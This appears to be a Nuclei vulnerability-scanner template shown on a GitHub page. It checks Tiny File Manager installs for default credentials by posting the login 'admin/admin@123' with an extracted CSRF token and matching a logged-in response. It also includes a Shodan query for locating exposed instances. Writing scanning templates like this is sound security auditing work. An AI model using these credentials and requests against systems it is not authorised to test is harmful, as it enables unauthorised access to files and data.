-
Notifications
You must be signed in to change notification settings - Fork 2.4k
/
tiny-file-manager-default-login.yaml
67 lines (59 loc) · 1.71 KB
/
tiny-file-manager-default-login.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
id: tiny-filemanager-default-login
info:
name: Tiny File Manager - Default Login
author: shelled
severity: high
description: Tiny File Manager contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
reference:
- https://github.com/prasathmani/tinyfilemanager
- https://tinyfilemanager.github.io/docs/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
verified: true
max-request: 3
shodan-query: html:"Tiny File Manager"
tags: default-login,tiny,filemanager
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
fm_usr={{user}}&fm_pwd={{pass}}&token={{token}}
- |
GET /?p= HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
user:
- admin
pass:
- admin@123
skip-variables-check: true
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- 'admin'
- 'You are logged in'
- 'Tiny File Manager'
condition: and
- type: status
status:
- 200
extractors:
- type: regex
name: token
part: body
regex:
- '([a-f0-9]{64})'
internal: true
# digest: 490a0046304402203a6d1f960ddfa4db3523830d956bd204b0b45293b82f04cfb4f9ef2e12197d19022027eb9849b05622c8350ed6179482e038a785a90d0748cf23625e223b85395479:922c64590222798bb761d5b6d8e72950